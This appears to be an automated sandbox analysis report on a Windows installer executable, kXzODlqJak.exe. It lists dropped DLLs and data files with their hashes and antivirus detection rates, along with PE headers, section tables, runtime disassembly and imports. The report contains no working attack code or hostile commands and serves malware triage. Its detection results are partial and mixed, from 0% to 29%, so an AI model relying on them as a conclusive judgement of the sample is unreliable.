Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.u.n.d.l.e.E.x.t.e.n.s.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.w.i.x.t.o.o.l.s.e.t...o.r.g./.s.c.h.e.m.a.s./.v.4./.B.u.n.d.l.e.E.x.t.e.n.s.i.o.n.D.a.t.a.". ./.>.

Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2598912
Entropy (8bit):6.6049974235008655
Encrypted:false
SSDEEP:49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
MD5:FECC62A37D37D9759E6B02041728AA23
SHA1:0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
SHA-256:94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
SHA-512:698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):8581632
Entropy (8bit):6.736578346160889
Encrypted:false
SSDEEP:98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
MD5:831BA3A8C9D9916BDF82E07A3E8338CC
SHA1:6C89FD258937427D14D5042736FDFCCD0049F042
SHA-256:D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
SHA-512:BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1053696
Entropy (8bit):6.539052666912709
Encrypted:false
SSDEEP:12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
MD5:8A2E025FD3DDD56C8E4F63416E46E2EC
SHA1:5F58FEB11E84AA41D5548F5A30FC758221E9DD64
SHA-256:52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
SHA-512:8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):356352
Entropy (8bit):6.447802510709224
Encrypted:false
SSDEEP:6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
MD5:E9A9411D6F4C71095C996A406C56129D
SHA1:80B6EEFC488A1BF983919B440A83D3C02F0319DD
SHA-256:C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
SHA-512:93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%

Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):6487736
Entropy (8bit):7.518089126573906
Encrypted:false
SSDEEP:98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
MD5:11C8962675B6D535C018A63BE0821E4C
SHA1:A150FA871E10919A1D626FFE37B1A400142F452B
SHA-256:421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
SHA-512:3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%

Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):664064
Entropy (8bit):6.953961612144461
Encrypted:false
SSDEEP:12288:c/gzbnbASodCXNn5FJX5KLN9VmoBBDFyn/:kRSoSn5FJX5K59VmoDK
MD5:A147F46E2E1F315AA219482D645BEED9
SHA1:073A6AE153A903B31463FA33512AA93DA1E3BB6F
SHA-256:2EB33D31364355ACBA660487F3747A9899DBDEB2221C58EB2BF916E53267DBC4
SHA-512:690DD6A959C6043EFE48ECB840C6353B2CE5F95372933A7201959C5A2075657EE2B02921685EAF23AE0EC228ABD86AA24F7CB11A9F089EB49D20F6AB6C46E3B8
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):60283
                                                                                                                                                                Entropy (8bit):4.569551839311306
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:JLFhcTCRX7325Q72JnHi/KPHVzwrU60mYuBYdoQ:hIC173hknmqBrRmzB9Q
                                                                                                                                                                MD5:3620E2D48EB60EC875FB9262ABC87D2B
                                                                                                                                                                SHA1:55C7CE6E00901BE5090D7D1ACFF47D30436FA5EF
                                                                                                                                                                SHA-256:E8E6F472277E0F3EE5B6640B0EC436029AF329E37F0C84978399DEB38768BEB1
                                                                                                                                                                SHA-512:CBE8C6BE90FD75EE9D0A912E832ED784C4273B495EE1246B97601A6FA24FA4CE6FB07BE97508DA4FA249F05C96D5A86DA1805099C06EDD1CA81E726954025DD9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.M.kZ.u_aUO......KUF...ABb..F..u.]F.rV..f..t..qm.Z_C....a._rAHlPTAnm.XL...Bp\h.BD.nd..p.x..W.k..T]w.nn.l.xQ.NE.B.b.dF...K.V]j..Yr.A.t..O_mrdES_Ww.Wg.P.....vq.I.BT..f.Jm.xxf.....V.kU..HiyRuFEC`.....y...`cgmo.....Pk....UbG..GQ..N.o...wA^.A..K.J.Iv...xvp].Sh...Gh.F...OmAZdJ...c.....ftg...Bc....lKWOSh..[..j...h...Ra..If...oA.r.itG....x_m...K.........HV.mW.S..X.soGI[F.AavnVBbsd.W.hE..b^...kE.B.D.[.E......lsxC..rJUb.Ts.P....M.`[p...w.F...Mv...sJ.h.Gpc...PF.^.V^J..Q.j.JI.....r..aI.K.OSl..eU\vo.v...K.x..aR.h...h..R.N.sQ...Y.....K.B....VdiHm...s........_......w.^RY`.o`H.WT.sJ.is...]..^A]Z....k.KJ..s...p.F...l..........f.wq\g....MRl..a..o....cZ].`.D.w._g.g.X.b...WdC.GLeCj[.y...HR..mG.V.k...v..YA.KPhvtC..v.gpnBw..m....]..V.f...`..W..T.QnMk.sZ.We...u.^.h^....A.C....W.ww..H...y.m..Py..jV.rOgkpnaCm.....jZL..Xo...hS......Ao..e\^y]...PS.EMf.^k.Uu.TmO..\\WsQ.T..u.w.qAq`x\..m.S]Z.......po...^H\nphxx.y..Z.X.Zs........oO.r.m..vh.W.k....mBMw.JJ.hc...p].[........n..nI...R...MU.F.v.w......s..[C...LU...C..y.J
                                                                                                                                                                Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):421200
                                                                                                                                                                Entropy (8bit):6.59808962341698
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
                                                                                                                                                                MD5:03E9314004F504A14A61C3D364B62F66
                                                                                                                                                                SHA1:0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
                                                                                                                                                                SHA-256:A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
                                                                                                                                                                SHA-512:2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._d..17..17..17...7..17..7..17..07 .17(..7..17..7..17..7..17..7..17..7..17..7..17..7..17..7..17Rich..17........................PE..L.....K.........."!.................<.............x......................................@.................................`...<.... ...............V..P....0..H;..p................................/..@...............p............................text............................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):770384
                                                                                                                                                                Entropy (8bit):6.908020029901359
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
                                                                                                                                                                MD5:67EC459E42D3081DD8FD34356F7CAFC1
                                                                                                                                                                SHA1:1738050616169D5B17B5ADAC3FF0370B8C642734
                                                                                                                                                                SHA-256:1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
                                                                                                                                                                SHA-512:9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Windows\Temp\{C5BEABB3-6F8A-4E54-9E3E-0E8BAFC0CCA7}\.cr\kXzODlqJak.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4485813
                                                                                                                                                                Entropy (8bit):7.960501110953352
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:98304:zvf5BQTYhbOg6IdJogvR31mRCbJ2O4qm08UhFdFtZ7C5Bd6wKWgSKNKk8R:zvhy2cW31mRCbEqf8UhFiBdQ+kO
                                                                                                                                                                MD5:B56FE6EA5F9CAFB0C73A95A3377C8CA1
                                                                                                                                                                SHA1:252F48E39D28A5554152F32F23A406E4E9E752DD
                                                                                                                                                                SHA-256:04C5B808B740AC5F17B12956AD0D1B2C21EA1D6A6011275AC2A0D08B454EDB6A
                                                                                                                                                                SHA-512:1A094CD5029F1D2BD0E804EC7F1911CF25CE319BEF3EB03BC57DF09A5BCF5957C813F9F7FF57B936F0596E0E00F3B447E2E2C3B5BAE9F3AD99BEB63C441DC0D7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.b...C.y.y.m..L......\^..n.N.HQ..n.Eh.....l..q.JY.kE....peI.k.c..mE..c.Lr\p...ZTW.X.qo.s.x..HHb.f.aq..s.\E^^mYoR_Cb...].xBM.xR.[.kpg.MGx_.x.Xkx..._...jilM.[.CAm....tV...wtM...ywlI..yU.S.WQHig..w.].Sx_QX]...LLL_sC.P.y.pj.TgH.C..dOC.RqnoF....Qv.....b.m..M.]X.L.hvbeZ..f.ma....tNrr.Cbe..S..Yvnjbh...C..mqWsjglcP.W.Mu.TIq..fYcf.K..WbMIp...IRn[.G..Y..V.._..]..L].U...L]O..L.uHt`.._VBuVd.hK.DhxRlwPY[...xo....F^SLA.....[gXWLVF.......wX.w.b...nlUr.E.D...UN.f..JM.f.T.CF.....yO.RmS]..d.^e...O..b.^\K^.......kc[U...yfym...Vc..a.oUd.rD.kDWFLcL.UIZM.cfQK.e^..hvr.oxq.FI..QNP...LQT..q...h..i_.hA.mu.d......HKg.UK...tL...x...q^...h.._.q.LT.g.t]do.BM.S.HKj[..q..R.[O^.E.IV.v..hfA.mh..^N..h.......Th..shY...xLOtm\Jl.\fZ..g.b.b.`....A.ao.f..^.y...of...B..y....R..W.P..nYuE..F.X...Wv.V..\^.rR.^..X....]gxml.ukp.Vc.f.F..A...K....Pix.IObhW_^C...^.....A.y..QUH.vg.W\o..hZ......MM....gK..L..m...E..T.O.i....pNt.Y..J...tD.n_...]JEfbw.p...f.^^.I..Y..L..QJb.M.i.H..........q..u..W^...Kv.T.y..fCeqB.l......bDm...._xd.].p.l..U
                                                                                                                                                                Process:C:\Users\user\Desktop\kXzODlqJak.exe
                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):14302064
                                                                                                                                                                Entropy (8bit):7.991632876953663
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:393216:naTis2twlNkiqrp/dKXKdt08/dEy0z+Zm1X8SN3y0rJEMlw:naTutwjk93KXHaZ06Zm1MSN3jw
                                                                                                                                                                MD5:2C6652F7E01283DE091B5200B7878E69
                                                                                                                                                                SHA1:C7503315A496A65C28E4BE9FB397FFB830C54F8F
                                                                                                                                                                SHA-256:C1E1F6EB7AC42447F53711EAE48AF5B53FB6D75C9CE43CF7E4EDC413CCFB36F4
                                                                                                                                                                SHA-512:896B0BBD6E8F9E64472589A92C52537FC0140D9E05856A8E2578734E6C0D3D5D57562A63598FCB6E5A20CEA153C74884505D25E2971061DDA45C82F30C3B23AF
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Gc..............Hz......Hz.....L~......L~......L~..(...k..W...Hz......Hz......Hz..........^....~.......~,.......D......~......Rich............................PE..L....p-d..............."............Pj............@.......................................@.................................H............N...................P..h_..`...T...............................@....................... ....................text...9........................... ..`.rdata..L...........................@..@.data...............................@....didat..............................@....wixburn0...........................@..@.rsrc....N.......P..................@..@.reloc..h_...P...`..................@..B........................................................................................................................................................................................
                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Entropy (8bit):7.991646972369456
                                                                                                                                                                TrID:
                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                File name:kXzODlqJak.exe
                                                                                                                                                                File size:14'323'584 bytes
                                                                                                                                                                MD5:ab79eafcce0d6eff856b259977e480e1
                                                                                                                                                                SHA1:736603a24e9b143a644c1fe3673c7ac7fbeee37c
                                                                                                                                                                SHA256:3785dc3dbc0410893f31c71fa977648063f1e498e28e6783261d81c7ab21c075
                                                                                                                                                                SHA512:1aaaffb13ac1d9d400c3409ab00398fca33c1e118e4e9f8f6e1c4534f632693086d5f2525930b92473fb784551d4853679ea1cf7e395ab6dd7dfb138e6957f07
                                                                                                                                                                SSDEEP:393216:naTis2twlNkiqrp/dKXKdt08/dEy0z+Zm1X8SN3y0rJEMl7:naTutwjk93KXHaZ06Zm1MSN3j7
                                                                                                                                                                TLSH:CCE63331A1A2303FE6F52DB3B92496343D6CB2181B5486FEC6D0E84D38689D56EF7346
                                                                                                                                                                File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Gc..............Hz......Hz......L~......L~......L~..(....k..W...Hz......Hz......Hz..........^....~.......~,.......D......~.....
                                                                                                                                                                Icon Hash:2d2e3797b32b2b99
                                                                                                                                                                Entrypoint:0x446a50
                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                Digitally signed:false
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                Time Stamp:0x642D70FB [Wed Apr 5 13:00:43 2023 UTC]
                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                OS Version Major:6
                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                File Version Major:6
                                                                                                                                                                File Version Minor:0
                                                                                                                                                                Subsystem Version Major:6
                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                Import Hash:657e40fb09b2c5e277b865a7cf2b8089
                                                                                                                                                                Instruction
                                                                                                                                                                call 00007FB39D11DB28h
                                                                                                                                                                jmp 00007FB39D11D51Dh
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                retn 0000h
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
                                                                                                                                                                int3
int3
int3
int3
; 64-bit integer multiply helper (matches the MSVC CRT _allmul pattern)
mov eax, dword ptr [esp+08h]
mov ecx, dword ptr [esp+10h]
or ecx, eax
mov ecx, dword ptr [esp+0Ch]
jne 00007FB39D11D6ABh
mov eax, dword ptr [esp+04h]
mul ecx
retn 0010h
push ebx
mul ecx
mov ebx, eax
mov eax, dword ptr [esp+08h]
mul dword ptr [esp+14h]
add ebx, eax
mov eax, dword ptr [esp+08h]
mul ecx
add edx, ebx
pop ebx
retn 0010h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
; 64-bit unsigned divide helper (matches the MSVC CRT _aulldiv pattern)
push ebx
push esi
mov eax, dword ptr [esp+18h]
or eax, eax
jne 00007FB39D11D6BAh
mov ecx, dword ptr [esp+14h]
mov eax, dword ptr [esp+10h]
xor edx, edx
div ecx
mov ebx, eax
mov eax, dword ptr [esp+0Ch]
div ecx
mov edx, ebx
jmp 00007FB39D11D6E3h
mov ecx, eax
mov ebx, dword ptr [esp+14h]
mov edx, dword ptr [esp+10h]
mov eax, dword ptr [esp+0Ch]
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jne 00007FB39D11D696h
div ebx
mov esi, eax
mul dword ptr [esp+18h]
mov ecx, eax
mov eax, dword ptr [esp+14h]
mul esi
add edx, ecx
jc 00007FB39D11D6B0h
cmp edx, dword ptr [esp+10h]
jnbe 00007FB39D11D6AAh
jc 00007FB39D11D6A9h
cmp eax, dword ptr [esp+0Ch]
jbe 00007FB39D11D6A3h
dec esi
xor edx, edx
mov eax, esi
pop esi
pop ebx
retn 0010h
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9a748 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa0000 | 0x4efc | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa5000 | 0x5f68 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x99560 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x995c0 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x991e0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x6e000 | 0x3f8 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x9a2a4 | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6c139 | 0x6c200 | 92efecf5cfa9e863e69713e8451295eb | False | 0.5022376264450867 | data | 6.489848341668886 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x6e000 | 0x2de4c | 0x2e000 | c796b8ce19f947fe45f2a6998482442b | False | 0.27885636039402173 | data | 5.073579231118804 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9c000 | 0x1790 | 0xa00 | 0d375a46a1b65b20341c234446129bcf | False | 0.18828125 | firmware 2005 v9319 (revision 0) \277E V2, 0 bytes or less, at 0 0 bytes , at 0 0 bytes | 2.357689911760452 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x9e000 | 0xcc | 0x200 | 00535babd2373dd0ad324ceba5e2fc7b | False | 0.263671875 | data | 1.7948113869126585 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.wixburn | 0x9f000 | 0x30 | 0x200 | ab5f7325b234bacb71b5d58f9a9ff40e | False | 0.10546875 | data | 0.5556939563611969 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0xa0000 | 0x4efc | 0x5000 | 66e987baf579d3084984000d74768671 | False | 0.3189453125 | data | 5.418748157498877 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xa5000 | 0x5f68 | 0x6000 | bf2489eda548104ef6d2ce4e15cf676f | False | 0.7933349609375 | data | 6.795414107251252 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xa01c0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.43185920577617326
RT_RCDATA | 0xa0a68 | 0x8 | data | English | United States | 1.75
RT_MESSAGETABLE | 0xa0a70 | 0x3d74 | data | English | United States | 0.282418001525553
RT_GROUP_ICON | 0xa47e4 | 0x14 | data | English | United States | 1.15
RT_VERSION | 0xa47f8 | 0x2c8 | data | English | United States | 0.4705056179775281
RT_MANIFEST | 0xa4ac0 | 0x43c | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (1081), with no line terminators | English | United States | 0.5027675276752768
DLL | Import
KERNEL32.dll | GetUserDefaultUILanguage, GetUserDefaultLangID, GetSystemDefaultLangID, GetStringTypeW, ReadFile, SetFilePointerEx, CreateProcessW, DuplicateHandle, FreeLibrary, ProcessIdToSessionId, ConnectNamedPipe, SetNamedPipeHandleState, CreateNamedPipeW, OpenProcess, GetProcessId, SetProcessShutdownParameters, LocalFileTimeToFileTime, SetEndOfFile, SetFileTime, GetExitCodeThread, DosDateTimeToFileTime, CompareStringA, SetThreadExecutionState, ReleaseSemaphore, CreateMutexW, GetExitCodeProcess, CreateFileMappingW, MapViewOfFile, UnmapViewOfFile, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, RtlUnwind, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, GetStdHandle, ExitProcess, GetModuleHandleExW, VerifyVersionInfoW, GetFileType, FindFirstFileExW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileSizeEx, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, DecodePointer, WriteConsoleW, GetComputerNameW, GetSystemTime, VerSetConditionMask, CompareStringW, GetNativeSystemInfo, CreateThread, GetCurrentProcess, CreateSemaphoreW, CreateEventW, ReleaseMutex, ResetEvent, SetEvent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, MoveFileExW, SetFileAttributesW, RemoveDirectoryW, GetFileAttributesW, FindNextFileW, FindFirstFileW, FindClose, DeleteFileW, GetCurrentDirectoryW, ExpandEnvironmentStringsW, GetProcessHeap, HeapSize, HeapFree, GetDateFormatW, HeapReAlloc, HeapAlloc, GetModuleFileNameW, GetSystemWow64DirectoryW, GetSystemDirectoryW, GetLocalTime, Sleep, SetLastError, GetTempPathW, GetVolumePathNameW, GetTempFileNameW, GetFullPathNameW, CreateDirectoryW, LCMapStringW, WideCharToMultiByte, MultiByteToWideChar, lstrlenW, FormatMessageW, LocalFree, LoadLibraryExW, GetProcAddress, GetModuleHandleW, WaitForMultipleObjects, WaitForSingleObject, HeapSetInformation, GetLastError, lstrlenA, GetCurrentProcessId, GetModuleHandleA, MulDiv, CompareStringOrdinal, GetSystemWindowsDirectoryW, GlobalAlloc, GlobalFree, CopyFileW, LoadResource, LockResource, SizeofResource, FindResourceExA, VirtualAlloc, VirtualFree, SystemTimeToTzSpecificLocalTime, SystemTimeToFileTime, GetTimeZoneInformation, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, WriteFile, SetFilePointer, CreateFileA, CloseHandle, CreateFileW
USER32.dll | ReleaseDC, MonitorFromPoint, MonitorFromWindow, GetDC, GetMonitorInfoW, ShowWindow, IsDialogMessageW, LoadCursorW, LoadBitmapW, SetWindowLongW, GetWindowLongW, GetCursorPos, MessageBoxW, SetWindowPos, CreateWindowExW, UnregisterClassW, RegisterClassW, PostQuitMessage, DefWindowProcW, DispatchMessageW, TranslateMessage, GetMessageW, WaitForInputIdle, IsWindow, PostMessageW
GDI32.dll | SelectObject, StretchBlt, GetObjectW, DeleteObject, DeleteDC, GetDeviceCaps, CreateCompatibleDC, CreateDCW
ADVAPI32.dll | CryptHashData, CryptDestroyHash, CryptReleaseContext, OpenProcessToken, AllocateAndInitializeSid, CheckTokenMembership, GetTokenInformation, AdjustTokenPrivileges, IsWellKnownSid, LookupPrivilegeValueW, CryptCreateHash, RegCreateKeyExW, RegDeleteKeyW, RegEnumKeyExW, RegEnumValueW, RegSetValueExW, CryptGetHashParam, QueryServiceStatus, OpenServiceW, OpenSCManagerW, ControlService, CloseServiceHandle, ChangeServiceConfigW, SetEntriesInAclW, DecryptFileW, InitializeAcl, CreateWellKnownSid, ConvertStringSecurityDescriptorToSecurityDescriptorW, ReportEventW, OpenEventLogW, CloseEventLog, RegQueryInfoKeyW, RegDeleteValueW, RegQueryValueExW, GetUserNameW, InitiateSystemShutdownExW, RegOpenKeyExW, RegCloseKey, QueryServiceConfigW, SetNamedSecurityInfoW, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, SetEntriesInAclA, CryptAcquireContextW
